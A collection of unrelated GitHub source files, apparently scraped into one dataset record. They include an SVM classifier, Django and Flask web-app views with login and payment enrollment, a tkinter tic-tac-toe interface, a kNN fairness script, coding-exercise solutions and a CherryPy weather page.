+{"seq_id":"30156496699","text":"import numpy as np\nfrom scipy.optimize import minimize\nfrom pandas.core.frame import DataFrame\nfrom pandas.core.series import Series\nfrom scipy.optimize import OptimizeResult\n\nclass DualSVM():\n    def gaussKernel(self, xi: np.ndarray):\n        xi = np.asmatrix(xi)\n        return np.exp(-((np.sum(np.multiply(xi, xi), axis = 1) + np.sum(np.multiply(xi.T, xi.T) , axis = 0) - 2 * xi.T * xi) / self.gamma))\n        #return np.exp(-((np.sum(xi.T.dot(xi), axis = 1) + np.sum(np.multiply(xi.T, xi.T) , axis = 0) + 2 * xi.T @ xi) / self.gamma))\n\n    def gaussKernelDual(self, xi: np.ndarray, xj: np.ndarray):\n        return np.exp(- (((xi-xj)**2).sum())/self.gamma)\n\n    def gaussObjective(self, alphas: np.ndarray):\n        #return 0.5 * (self.gaussKernel(self.x) * np.dot( (alphas * self.y).T, (alphas*self.y) ) ).sum() - alphas.sum()\n        return 0.5 * (self.xg * np.dot((alphas * self.y).T, (alphas*self.y)) ).sum() - alphas.sum()\n\n    def constraints(self, alphas: np.ndarray):\n        return (alphas * self.yarr).sum()\n\n    def objective(self,alphas: np.ndarray):\n        return 0.5 * (np.dot(self.x, self.x.T) * np.dot((alphas * self.y).T, (alphas*self.y)) ).sum() - alphas.sum()\n\n    def __init__(self, training_data: DataFrame, output_column: str, C = 0.5, useGaussKernel=False, gamma = 1) -> None:\n        self.training_data = training_data.copy(deep=True)\n        #Let's wrap in a bias term as the last column before the labels\n        self.training_data.insert(len(self.training_data.columns) - 1, \"bias\", 1)\n\n        self.y = np.array([self.training_data[output_column].to_numpy()])\n        self.yarr = self.training_data[output_column].to_numpy()\n        self.gamma = gamma\n        self.useGaussKernel = useGaussKernel\n        \n        self.x = self.training_data.drop([output_column], axis=1).to_numpy()\n        self.alphas = np.random.rand(len(self.x))\n        self.bounds = [(0,C)] * len(self.alphas)\n\n        self.output_column = output_column\n        self.C = C\n\n        cons = ({'type':'eq', 'fun':self.constraints})\n        if useGaussKernel:\n            print(\"building kernel\")\n            self.xg = np.zeros((len(self.x), len(self.x)))\n            for i in range(len(self.x)):\n                xi = self.x[i]\n                for j in range(len(self.x)):\n                    self.xg[i][j] = self.gaussKernelDual(xi, self.x[j])\n\n            #self.xg = self.x.T.dot(np.sum(self.x.dot(self.x), axis=1))\n            print(\"optimizing\")\n            solution: OptimizeResult = minimize(fun=self.gaussObjective, x0=self.alphas, constraints=cons, bounds=self.bounds, method='SLSQP')\n        else:\n            solution: OptimizeResult = minimize(fun=self.objective, x0=self.alphas, constraints=cons, bounds=self.bounds, method='SLSQP')\n\n        
self.alphas = solution.x\n print(solution.message)\n self.w: np.ndarray = np.zeros(len(self.training_data.columns) - 1) \n \n # this part is slow but we only need to do it once!\n if not useGaussKernel:\n for a,yi,x in zip(self.alphas, self.training_data[output_column].to_numpy(), self.x):\n if a == 0:\n continue\n self.w = self.w + (a * yi) * x\n\n #self.w = (self.alphas * self.y * self.x).sum(axis=1)\n \n\n\n def get_label(self, row: Series):\n # row needs to be augmented to support the bias.\n rowArr = row.drop(self.output_column).to_numpy()\n rowArr = np.append(rowArr, 1)\n \n\n if self.useGaussKernel:\n #rowArr = np.asmatrix(rowArr)\n prediction = 0.0\n for i in range(len(self.alphas)):\n if self.alphas[i] == 0: \n continue\n prediction = prediction + self.alphas[i] * self.yarr[i] * self.C * self.gaussKernelDual(self.x[i], rowArr)\n\n output = prediction\n else:\n output = self.w.T.dot(rowArr)\n\n if output >= 0:\n return 1\n else:\n return -1","repo_name":"Atomic-Johnson/mllib","sub_path":"SVM/dualSVM.py","file_name":"dualSVM.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37313884667","text":"from rest_framework import filters, status\nfrom rest_framework import generics\nfrom rest_framework.generics import GenericAPIView\nfrom rest_framework.parsers import MultiPartParser\nfrom rest_framework.response import Response\n\nfrom reefsource.apps.albums.models import UploadedFile, Album\nfrom reefsource.core.rest_framework.permissions import CustomPermission\nfrom .serializers import UploadedFileSerializer, AlbumSerializer, AlbumDetailSerializer, EmptyUploadedFileSerializer\n\n\nclass FileUploadView(generics.CreateAPIView):\n queryset = UploadedFile.objects.all()\n serializer_class = UploadedFileSerializer\n parser_classes = (MultiPartParser,)\n\n def __init__(self):\n super(__class__, self).__init__()\n self.albumId = None\n\n def get_queryset(self):\n queryset = super(__class__, self).get_queryset()\n queryset = queryset.filter(album__user=self.request.user)\n\n return queryset\n\n def create(self, request, albumId, *args, **kwargs):\n self.albumId = albumId\n return super(__class__, self).create(request, *args, **kwargs)\n\n def perform_create(self, serializer):\n params = {'album_id': self.albumId,\n 'original_filename': serializer.validated_data['file'].name,\n 'filesize': serializer.validated_data['file'].size,\n 'mime_type': serializer.validated_data['file'].content_type}\n\n serializer.save(**params)\n\n\nclass FileUploadViewDetailView(generics.RetrieveDestroyAPIView):\n queryset = UploadedFile.objects.all()\n serializer_class = UploadedFileSerializer\n\n def get_queryset(self):\n queryset = super(__class__, self).get_queryset()\n queryset = queryset.filter(album__user=self.request.user)\n\n return queryset\n\n\nclass FileUploadReanalyzePermission(CustomPermission):\n required_perms = ('reanalyze_result',)\n\n\nclass FileUploadReanalyzeView(GenericAPIView):\n queryset = UploadedFile.objects.all()\n serializer_class = EmptyUploadedFileSerializer\n permission_classes = (FileUploadReanalyzePermission,)\n\n def post(self, request, *args, **kwargs):\n instance = self.get_object()\n\n from reefsource.apps.results.models import Result\n Result.objects.filter(uploaded_file=instance).delete()\n\n instance.start_stage1()\n\n serializer = self.get_serializer(instance=instance)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n\nclass AlbumApiMixin(object):\n 
queryset = Album.objects.all()\n    serializer_class = AlbumSerializer\n\n    def get_queryset(self):\n        queryset = super(__class__, self).get_queryset()\n\n        if not self.request.user.is_staff:\n            queryset = queryset.filter(user=self.request.user)\n\n        return queryset\n\n\nclass AlbumListView(AlbumApiMixin, generics.ListCreateAPIView):\n    filter_backends = (filters.OrderingFilter, filters.SearchFilter,)\n    ordering_fields = ('name', 'created', 'modified', 'date',)\n    ordering = ('-date',)\n    search_fields = ('name',)\n\n    def perform_create(self, serializer):\n        serializer.save(user=self.request.user)\n\n\nclass AlbumDetailView(AlbumApiMixin, generics.RetrieveUpdateDestroyAPIView):\n    serializer_class = AlbumDetailSerializer\n","repo_name":"reefsource/reefsource","sub_path":"reefsource/apps/albums/api/v1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3234,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"74080421314","text":"from flask import flash, make_response, render_template, redirect, request, session, url_for\nfrom acomp import app, db, loginmanager, sessions\nfrom flask_login import current_user, login_required, logout_user\nfrom urllib.parse import urlparse, urljoin\nfrom acomp.glUser import GLUser\nfrom acomp.auth import auth\n\nfrom acomp.forms import Captcha, Classic, Signup, Signin, SettingsUserName, SettingsChangePassword, \\\n    SettingsDeleteAccount\nimport json\n\nloginmanager.login_view = 'login'\n\n\ndef is_safe_url(target):\n    \"\"\" https://web.archive.org/web/20120517003641/http://flask.pocoo.org/snippets/62/ \"\"\"\n    ref_url = urlparse(request.host_url)\n    test_url = urlparse(urljoin(request.host_url, target))\n    return test_url.scheme in ('http', 'https') and \\\n           ref_url.netloc == test_url.netloc\n\n\n@app.route('/classic')\n@login_required\ndef classic():\n    form = Classic()\n    usr = GLUser(current_user.get_id())\n    user_name = usr.getName()\n    img = usr.startClassic()\n    return render_template('classic.html', source=img['images'], form=form, username=user_name)\n\n\n@app.route('/classic/data', methods=['GET'])\n@login_required\ndef classic_data_get():\n    usr = GLUser(current_user.get_id())\n    try:\n        data = usr.startClassic()\n        app.logger.debug(data)\n        res = make_response(json.dumps(data))\n    except Exception as e:\n        return bad_request(e)\n    else:\n        res.headers.set('Content-Type', 'application/json')\n        return res\n\n\n@app.route('/classic/data', methods=['POST'])\n@login_required\ndef classic_data_post():\n    data = request.get_json()\n    if data is None:\n        return bad_request('Invalid JSON.')\n    if 'tag' not in data:\n        return bad_request('Missing key in JSON.')\n    else:\n        usr = GLUser(current_user.get_id())\n        try:\n            tag = usr.tagImage(data['tag'])\n        except Exception as e:\n            return bad_request(e)\n        else:\n            res_data = {'accepted': tag[0], 'message': tag[1], 'score': tag[2]}\n            res = make_response(res_data)\n            res.headers.set('Content-Type', 'application/json')\n            return res\n\n\n@app.route('/captcha')\n@login_required\ndef captcha():\n    form = Captcha()\n    usr = GLUser(current_user.get_id())\n    user_name = usr.getName()\n    try:\n        images = usr.startCaptcha()\n        return render_template('captcha.html', source=images['images'], form=form, username=user_name)\n    except Exception as e:\n        flash('Currently there are not enough tagged images in our DB to play Captcha. '\n              'Please play the classic mode and try again later.')\n        return render_template('captcha.html', source='', form=form, 
username=user_name)\n\n\n@app.route('/captcha/data', methods=['GET'])\n@login_required\ndef captcha_get():\n usr = GLUser(current_user.get_id())\n try:\n data = usr.startCaptcha()\n app.logger.debug(data)\n res = make_response(json.dumps(data))\n except Exception as e:\n return bad_request(e)\n else:\n res.headers.set('Content-Type', 'application/json')\n return res\n\n\n@app.route('/captcha/data', methods=['POST'])\n@login_required\ndef captcha_post():\n data = request.get_json()\n if data is None:\n return bad_request('Invalid JSON.')\n if 'joker' in data:\n usr = GLUser(current_user.get_id())\n try:\n wrng_images = usr.jokerCaptcha()\n except Exception as e:\n return bad_request(e)\n else:\n res_data = {\"message\": wrng_images}\n res = make_response(json.dumps(res_data))\n res.headers.set('Content-Type', 'application/json')\n return res\n if 'captcha' in data:\n usr = GLUser(current_user.get_id())\n try:\n captcha = usr.capCaptcha(data['captcha'])\n except Exception as e:\n return bad_request(e)\n else:\n res_data = {'accepted': captcha[0], 'message': captcha[1], 'score': captcha[2]}\n res = make_response(res_data)\n res.headers.set('Content-Type', 'application/json')\n return res\n else:\n return bad_request('Missing key in JSON.')\n\n\n@app.route('/quiz')\ndef quiz():\n if current_user.is_authenticated:\n return redirect(url_for('tutorial'))\n if 'quiz' not in session:\n session['quiz'] = 0\n if session['quiz'] >= app.config['ACOMP_QUIZ_POINTS']:\n flash('Congrats, you have reached enough points!')\n form = Captcha()\n usr = GLUser(-1)\n try:\n images = usr.startCaptcha()\n app.logger.debug('Current quiz score: {}'.format(session['quiz']))\n return render_template('captcha.html', source=images['images'], form=form)\n except:\n session['quiz'] = app.config['ACOMP_QUIZ_POINTS']\n flash('There are currently not enough tagged images in the database for the entry quiz. 
You may signup directly.')\n return redirect(url_for('signup'))\n\n\n@app.route('/quiz/data', methods=['GET'])\ndef quiz_get():\n if 'quiz' not in session:\n return forbidden('Not authorized.')\n if session['quiz'] >= app.config['ACOMP_QUIZ_POINTS']:\n flash('Congrats, you have reached enough points!')\n\n usr = GLUser(-1)\n try:\n data = usr.startCaptcha()\n app.logger.debug(data)\n res = make_response(json.dumps(data))\n except Exception as e:\n return bad_request(e)\n else:\n res.headers.set('Content-Type', 'application/json')\n return res\n\n\n@app.route('/quiz/data', methods=['POST'])\ndef quiz_post():\n if 'quiz' not in session:\n return forbidden('Not authorized.')\n\n data = request.get_json()\n if data is None:\n return bad_request('Invalid JSON.')\n if 'captcha' not in data:\n return bad_request('Missing key in JSON.')\n else:\n usr = GLUser(-1)\n try:\n challange, captcha = usr.capEntryQuiz(data['captcha'])\n except Exception as e:\n return bad_request(e)\n else:\n session['quiz'] += 1 if challange == 1 else -1\n signup_permission = int(session['quiz'] >= app.config['ACOMP_QUIZ_POINTS'])\n\n data = {'OK': signup_permission, 'message': captcha[0]}\n res = make_response(data)\n res.headers.set('Content-Type', 'application/json')\n return res\n\n\n@app.route('/tutorial')\ndef tutorial():\n form = Classic()\n return render_template('tutorial.html', source='../static/img/tutorial_1.jpg', form=form)\n\n\n@app.route('/signup', methods=['GET', 'POST'])\ndef signup():\n if current_user.is_authenticated:\n return redirect(url_for('settings'))\n form = Signup()\n if 'quiz' not in session:\n return redirect('quiz')\n elif session['quiz'] < app.config['ACOMP_QUIZ_POINTS']:\n return redirect('quiz')\n elif form.validate_on_submit():\n auth.register(form.loginname.data, form.loginpswd.data, form.loginpswdConfirm.data)\n auth.login(form.loginname.data, form.loginpswd.data)\n return redirect(url_for('tutorial'))\n app.logger.debug('Current quiz score: {}'.format(session['quiz']))\n return render_template('signup.html', form=form)\n\n\n@app.route('/signup/data', methods=['POST'])\n@app.route('/settings/data', methods=['POST'])\ndef signup_post():\n data = request.get_json()\n if data is None:\n return bad_request('Invalid JSON.')\n if 'name' not in data:\n return bad_request('Missing key in JSON.')\n else:\n if (auth.exists(data['name'])):\n res = make_response('{\"available\":\"0\", \"message\":\"Username not available\"}')\n else:\n res = make_response('{\"available\":\"1\", \"message\":\"Username available\"}')\n res.headers.set('Content-Type', 'application/json')\n return res\n\n\n@app.route('/', methods=['GET', 'POST'])\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('settings'))\n form = Signin()\n if form.validate_on_submit():\n try:\n app.logger.debug('Login user name {}'.format(form.loginname.data))\n usr_id = auth.login(form.loginname.data, form.loginpswd.data)\n if usr_id > 0:\n app.logger.debug('Login user id {}'.format(usr_id))\n app.logger.debug('Current user id {}'.format(current_user.get_id()))\n target = request.args.get('next')\n if not is_safe_url(target):\n return bad_request('Could not redirect to ' + target)\n else:\n return redirect(url_for('classic'))\n except Exception as e:\n flash(e)\n return render_template('login.html', form=form)\n\n\n@app.route('/logout')\n@login_required\ndef logout():\n logout_user()\n return redirect(url_for('login'))\n\n\n@app.route('/settings', methods=['GET', 
'POST'])\n@login_required\ndef settings():\n nameform = SettingsUserName()\n passwordform = SettingsChangePassword()\n deleteform = SettingsDeleteAccount()\n usr = GLUser(current_user.get_id())\n user_name = usr.getName()\n\n if nameform.validate_on_submit():\n try:\n app.logger.debug('Change name to {}'.format(nameform.newloginname.data))\n usrname = auth.changename(current_user.get_id(), nameform.newloginname.data, nameform.loginpswd.data)\n flash('Name change successful.')\n app.logger.debug('Current user id {}'.format(current_user.get_id()))\n app.logger.debug('Name change for {}'.format(usrname))\n except Exception as e:\n flash(e)\n\n if passwordform.validate_on_submit():\n try:\n usr_id = auth.changetoken(current_user.get_id(), passwordform.oldpswd.data, passwordform.newpswd.data,\n passwordform.newpswdConfirm.data)\n if usr_id > 0:\n flash('Password change successful.')\n app.logger.debug('Current user id {}'.format(current_user.get_id()))\n app.logger.debug('Change password for {}'.format(usr_id))\n except Exception as e:\n flash(e)\n\n if deleteform.validate_on_submit():\n try:\n app.logger.debug('Delete user id {}'.format(current_user.get_id()))\n usrname = auth.delete(current_user.get_id(), deleteform.loginpswddelform.data)\n app.logger.debug('Deleted user {}'.format(usrname))\n flash('User deleted.')\n return redirect(url_for('login'))\n except Exception as e:\n flash(e)\n\n return render_template('settings.html', nameform=nameform, deleteform=deleteform, passwordform=passwordform,\n username=user_name)\n\n\n@app.route('/settings/data', methods=['GET'])\n@login_required\ndef opendata():\n usr = GLUser(current_user.get_id())\n try:\n data = usr.getOpenData()\n app.logger.debug(data)\n res = make_response(json.dumps(data))\n except Exception as e:\n return bad_request(e)\n else:\n res.headers.set('Content-Type', 'application/json')\n return res\n\n\n@app.route('/help')\ndef help():\n return render_template('help.html')\n\n\n@app.route('/highscore')\n@login_required\ndef highscore():\n usr = GLUser(current_user.get_id())\n user_name = usr.getName()\n return render_template('highscore.html', data=usr.getHighscore(), username=user_name)\n\n\n@app.errorhandler(400)\ndef bad_request(e):\n return render_template('4xx.html', error_msg=e), 400\n\n\n@app.errorhandler(401)\ndef forbidden(e):\n return render_template('4xx.html', error_msg=e), 401\n\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('4xx.html', error_msg=e), 404\n","repo_name":"muesal/annotation-competition","sub_path":"src/acomp/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":11669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38437721001","text":"import json\n\nfrom flask import Blueprint, current_app\nfrom flask_jwt_extended import create_refresh_token, create_access_token, get_jwt_identity, jwt_required\nfrom flask import request, jsonify\nfrom app.handlers import APIException\nfrom app.database.db import cursor, lastrowid\nimport requests\n\nbp = Blueprint(\"new_enrollment\", __name__, url_prefix=\"/enrollments\")\n\n\n@bp.route(\"/enrollment\", methods=[\"POST\"])\n@jwt_required(optional=True)\ndef create_new_enrollment():\n body = request.json\n user_id = get_jwt_identity()\n\n # Check if user is already signed to that tour\n if user_id:\n cursor().execute(f\"SELECT id FROM enrollments WHERE tour_id=%s AND user_id=%s\", (body[\"tour_id\"], user_id))\n res = cursor().fetchall()\n if res:\n raise 
APIException(msg=\"Ta wycieczka została już przez Ciebie wykupiona\", code=400)\n\n\n # Check if tour enrollment process is active\n cursor().execute(f\"SELECT * FROM tours WHERE id=%s AND NOW() < enrollment_deadline\", (body[\"tour_id\"], ))\n res = cursor().fetchall()\n if not res:\n raise APIException(msg=\"Okres zapisów tej wycieczki zakończył się\", code=400)\n tour_data = res[0]\n\n # Check if tour has available number of places\n cursor().execute(f\"SELECT sum(tickets) FROM enrollments WHERE tour_id=%s\", (body[\"tour_id\"], ))\n current_tickets = cursor().fetchone()[\"sum(tickets)\"]\n if current_tickets is None:\n current_tickets = 0\n person_limit = tour_data[\"person_limit\"]\n if current_tickets >= person_limit: # <-- checking if there are any available tickets\n raise APIException(msg=\"Ilość miejsc w ofercie została wyczerpana\", code=400)\n\n # Check if user's amount of tickets will exceed the person limit\n if current_tickets+len(body[\"participants\"]) > person_limit:\n raise APIException(msg=f\"W ofercie pozostało tylko {person_limit-current_tickets} miejsc\", code=400)\n\n\n\n # Create new enrollment\n columns = f\"f_name, l_name, phone_number, email, user_id, tour_id, city, postcode, street, house_number, apartment_number, comment, amount_payable\"\n insert = {\n \"f_name\": body[\"f_name\"],\n \"l_name\": body[\"l_name\"],\n \"phone_number\": body[\"phone_number\"],\n \"email\": body[\"email\"],\n \"user_id\": user_id if user_id else None,\n \"tour_id\": body[\"tour_id\"],\n \"city\": body[\"city\"],\n \"postcode\": body[\"postcode\"],\n \"street\": body[\"street\"],\n \"house_number\": body[\"house_number\"],\n \"apartment_number\": body[\"apartment_number\"],\n \"comment\": body[\"comment\"],\n \"amount_payable\": body[\"amount_payable\"]\n }\n cursor().execute(f\"INSERT INTO enrollments ({columns}) VALUES (%(f_name)s, %(l_name)s, %(phone_number)s, %(email)s, %(user_id)s, %(tour_id)s, %(city)s, %(postcode)s, %(street)s, %(house_number)s, %(apartment_number)s, %(comment)s, %(amount_payable)s)\", insert)\n enrollment_id = lastrowid()\n\n # Add participants to enrollment_participants table\n for full_name in body[\"participants\"]:\n cursor().execute(f\"INSERT INTO enrollment_participants (enrollment_id, full_name) VALUES (%s, %s)\", (enrollment_id, full_name))\n\n\n\n ### Make request to bitpay API ###\n url = \"https://test.bitpay.com/invoices\"\n token = current_app.config[\"BITPAY_SECRET_KEY\"]\n body = {\n \"token\": token,\n \"price\": body[\"amount_payable\"], # TODO change it to body[\"amount_payable\"], low value for now, for testing\n \"currency\": \"PLN\",\n \"itemDesc\": \"Zakup wycieczki\", #TODO It can be modified to tour's title\n \"notificationURL\": \"https://figlus.pl/api/payment/bitpay\",\n \"redirectURL\": \"https://figlus.pl/payment/success\",\n \"closeURL\": \"https://figlus.pl/payment/revoked\",\n \"posData\": json.dumps({\n \"enrollment_id\": enrollment_id,\n \"amount_payable\": body[\"amount_payable\"]\n }),\n \"transactionSpeed\": \"high\",\n \"fullNotifications\": False\n }\n headers = {\n \"Content-Type\": \"application/json\",\n \"X-Accept-Version\": \"2.0.0\"\n }\n\n response = requests.post(url, body, headers)\n res = response.json()\n\n payload = {\n \"url\": res[\"data\"][\"url\"]\n }\n\n response = jsonify(msg=f\"Zapis przebiegł pomyslnie + {current_tickets} \", payload=payload)\n return response, 
200","repo_name":"navuyi/Praca-Inzynierska-2022","sub_path":"BACKEND/API/endpoints/enrollments/enrollment_post.py","file_name":"enrollment_post.py","file_ext":"py","file_size_in_byte":4337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72489898434","text":"import sys\ninput = sys.stdin.readline\n\n# 파싱\na, b = map(int, input().split())\na -= 1\nb -= 1\n\n# 계산\nax, ay = a // 4, a % 4\nbx, by = b // 4, b % 4\n\n# 결과 출력\nprint(abs(ax - bx) + abs(ay - by))\n","repo_name":"Lairin-pdj/coding_test","sub_path":"baekjoon/1598_꼬리를 무는 숫자 나열.py","file_name":"1598_꼬리를 무는 숫자 나열.py","file_ext":"py","file_size_in_byte":203,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7381251298","text":"\nfrom tkinter import *\nfrom functools import partial\nimport tictactoe as ttt\n\nwindow = Tk()\n\nfield = [\n['_','_','_'],\n['_','_','_'],\n['x','_','0']]\n\n#todo убрать отладочную печать из другого файла и изменить цвет кнопок или текста \n\n# погуглить hello world на c и как его скомпилировать \n# погуглить про вим, базовый синтаксис C \n# занятие в вим \n\n\n# после mainloop выполняется только эта штука \ndef click(i,j):\n\tglobal field\n\tfield[i][j]='x'\n\tdraw_new_turn(field)\n\tfield = ttt.next_turn(field, '0')\n\tdraw_new_turn(field)\n\n\tprint(ttt.state(field))\n\n\n\n# drawing field\nbuttons_list = []\nfor i in range(3):\n buttons_list.append([])\n for j in range(3):\n button = Button(master=window, text=field[i][j], \n \tcommand = partial(click, i, j), \n \thighlightbackground = 'white',\n \tstate = DISABLED if (field[i][j] == 'x' or field[i][j] == '0') else NORMAL)\n button.grid(row=i, column=j)\n buttons_list[i].append(button)\n\nprint(buttons_list)\ndef draw_new_turn(field):\n\tfor i in range(3):\n\t\tfor j in range(3):\n\t\t\tbuttons_list[i][j]['text']=field[i][j]\n\t\t\tbuttons_list[i][j]['state']= DISABLED if (field[i][j] == 'x' or field[i][j] == '0') else NORMAL\n\n\n\n\n\n# отрисовка новой кнопки после нажатия \n# draw_new_turn([\n# ['x','x','0'],\n# ['0','x','_'],\n# ['x','_','0']])\n\n\n\n \n\n# def click(i,j):\n# \tdef indexes():\n# \t\tprint('indexes', i, j)\n# \treturn indexes\n\n\n# # drawing field\n# for i in range(3):\n# for j in range(3):\n# button = Button(master=window, text=field[i][j], command = click(i,j))\n# button.grid(row=i, column=j)\n\n\n# \ndef handle_click(event): # here should be indexes\n\tpass\n\n# button = tk.Button(text=\"Click me!\")\n\n# button.bind(\"\", handle_click)\n\nnew_field = None \n# changing element of field according indexes of pushed button\n\n\nwindow.mainloop()\n\n\n# for i in range(3):\n# for j in range(3):\n# frame = Frame( \n# master=window,\n# #relief = 'groove',\n# borderwidth=1,\n# # height = 4\n# )\n# frame.grid(row=i, column=j)\n# button = Button(master=frame, text=f\"Row {i}\\nColumn {j}\")\n# button.pack()\n\n\n# btn2 = Button()\n# btn2.pack\n\n\n# field = Label(text = 'Tic Tac Toe', \n# \tfg=\"white\",\n# bg=\"black\",\n# width=60,\n# height=60)\n\n# # frame1 = Frame(master=window, width=100, height=100, bg=\"red\")\n# # frame1.pack()\n\n# button = Button(\n# text=\"Click me!\",\n# width=25,\n# height=5,\n# bg='black',\n# fg=\"white\",\n# )\n\n# field.pack()\n# button.pack()\n\n\n\n\n# b=Button(t,text=\"hello\")\n\n# window = 
t.mainloop()\n\n","repo_name":"rudykas/edu","sub_path":"interface_ttt.py","file_name":"interface_ttt.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"22175869384","text":"import numpy as np\nimport numpy.linalg as la\nimport argparse\nimport csv\nnp.version.version\ntrain_data \t= np.genfromtxt('propublicaTrain.csv', usecols=(1,2,3,4,5,6,7,8,9),skip_header = 1, dtype = 'int8',delimiter=',')\ntrain_label\t= np.genfromtxt('propublicaTrain.csv', usecols=(0), skip_header = 1, dtype = 'int8',delimiter=',')\n\ntest_data \t= np.genfromtxt('propublicaTest.csv', usecols=(1,2,3,4,5,6,7,8,9),skip_header = 1, dtype = 'int8',delimiter=',')\ntest_label \t= np.genfromtxt('propublicaTest.csv', usecols=(0), skip_header = 1, dtype = 'int8',delimiter=',')\n\ntrain_num,_ = train_data.shape\ntest_num,_ = test_data.shape\ntest_data_0 = test_data[test_data[:,2] == 0]\ntest_data_1 = test_data[test_data[:,2] == 1]\nprint(test_data_0.shape)\nprint(test_data_1.shape)\n\n\nparser = argparse.ArgumentParser(description = 'knn classifier')\nparser.add_argument('-k', '--k', type = int, default =3, help = \"Hyper parameter k\")\nparser.add_argument('-n', '--norm', type = int, default =2, help = \"Hyper parameter norm\")\nargs = parser.parse_args()\n\n\n\n# print(train_data.shape,train_label.shape, test_data.shape,test_label.shape)\nk=args.k\nif args.norm<0:\n\tnorm_order = np.inf\nelse:\n\tnorm_order = args.norm\nhalf = int(k/2)\n\n\n\nm,n = test_data_0.shape\ncount_0 = [0,0,0]\nfor i in range(m):\n\tdiff = np.subtract(train_data,test_data_0[i])\n\tnorm = la.norm(diff, ord = norm_order, axis = 1)\n\ttemp = np.argsort(norm)\n\ttemp = temp[0:k]\n\n\tlabel_1 = 0\n\tfor x in temp:\n\t\tif train_label[x].item(0)>0:\n\t\t\tlabel_1+=1\n\tpredict_label = 0\n\tif label_1> half:\n\t\tpredict_label = 1\n\tif predict_label==0:\n\t\tcount_0[0]+=1\n\tif test_label[i].item(0) ==0:\n\t\tcount_0[2]+=1\n\tif test_label[i].item(0) == 0 and predict_label ==0:\n\t\tcount_0[1]+=1\n\nDP_0 = count_0[0]/m\nEO_0 = count_0[1]/count_0[2]\nPP_0 = count_0[1]/count_0[0]\nprint(\"DP a=0:\",DP_0)\nprint(\"EO a=0:\",EO_0)\nprint(\"PP a=0:\",PP_0)\nprint(count_0)\n\n\nm,n = test_data_1.shape\ncount_1 = [0,0,0]\nfor i in range(m):\n\tdiff = np.subtract(train_data,test_data_1[i])\n\tnorm = la.norm(diff, ord = norm_order, axis = 1)\n\ttemp = np.argsort(norm)\n\ttemp = temp[0:k]\n\n\tlabel_1 = 0\n\tfor x in temp:\n\t\tif train_label[x].item(0)>0:\n\t\t\tlabel_1+=1\n\tpredict_label = 0\n\tif label_1> half:\n\t\tpredict_label = 1\n\tif predict_label==0:\n\t\tcount_1[0]+=1\n\tif test_label[i].item(0) ==0:\n\t\tcount_1[2]+=1\n\tif test_label[i].item(0) == 0 and predict_label ==0:\n\t\tcount_1[1]+=1\n\nDP_1 = count_1[0]/m\nEO_1 = count_1[1]/count_1[2]\nPP_1 = count_1[1]/count_1[0]\nprint(\"DP a=1:\",DP_1)\nprint(\"EO a=1:\",EO_1)\nprint(\"PP a=1:\",PP_1)\nprint(count_1)\n\nDP_fair = abs(DP_1-DP_0)\nEO_fair = abs(EO_1-EO_0)\nPP_fair = abs(PP_1-PP_0)\nprint(\"DP_fair: \",DP_fair)\nprint(\"EO_fair: \",EO_fair)\nprint(\"PP_fair: \",PP_fair)\n\nwith open('DP_result.csv', 'a') as f:\n\twriter = csv.writer(f)\n\twriter.writerow(['knn',DP_fair])\n\nwith open('EO_result.csv', 'a') as f:\n\twriter = csv.writer(f)\n\twriter.writerow(['knn',EO_fair])\n\nwith open('PP_result.csv', 'a') as f:\n\twriter = 
csv.writer(f)\n\twriter.writerow(['knn',PP_fair])\n\n\n\n","repo_name":"ChengShen1996/MachineLearning","sub_path":"hw1/knn-fair.py","file_name":"knn-fair.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"8394905236","text":"# https://leetcode.com/problems/maximum-units-on-a-truck\n# Oleg Belov\n\nclass Solution:\n    def maximumUnits(self, boxTypes: List[List[int]], truckSize: int) -> int:\n        boxTypes.sort(key=lambda x: x[1], reverse=True)\n        units = 0\n        for box_t in boxTypes:\n            if box_t[0] <= truckSize:\n                truckSize -= box_t[0]\n                units += box_t[0] * box_t[1]\n            else:\n                units += truckSize * box_t[1]\n                break\n        return units","repo_name":"bgelov/python","sub_path":"built-ins/lambda/1710. Maximum Units on a Truck.py","file_name":"1710. Maximum Units on a Truck.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
+{"seq_id":"5261714156","text":"import cherrypy\nimport pywapi\nfrom mako.template import Template\n\ncherrypy.config.update({'server.socket_host': '0.0.0.0',\n                        'server.socket_port': 8080,\n                        })\n\nclass HelloWorld:\n    def index(self):\n        tmpl = Template(filename='index.html')\n        return tmpl.render(username=\"berg\")\n    index.exposed = True\n\n    def berg(self, area):\n        the_weather = pywapi.get_weather_from_yahoo(area, \"\")\n        \n        tmpl = Template(filename='weather.html')\n        tmpl_render = tmpl.render(\n            conditions=the_weather['condition']['title'],\n            cur_condition=the_weather['condition']['text'],\n            cur_temp=the_weather['condition']['temp'],\n            humidity=the_weather['atmosphere']['humidity'],\n            pressure=the_weather['atmosphere']['pressure'],\n            forecast_high=the_weather['forecasts'][1]['high'],\n            forecast_low=the_weather['forecasts'][1]['low'], \n            forecast_text = the_weather['forecasts'][1]['text'])\n\n        return tmpl_render\n    berg.exposed = True\n\ncherrypy.quickstart(HelloWorld())\n","repo_name":"mattinator/cherrypy-test","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
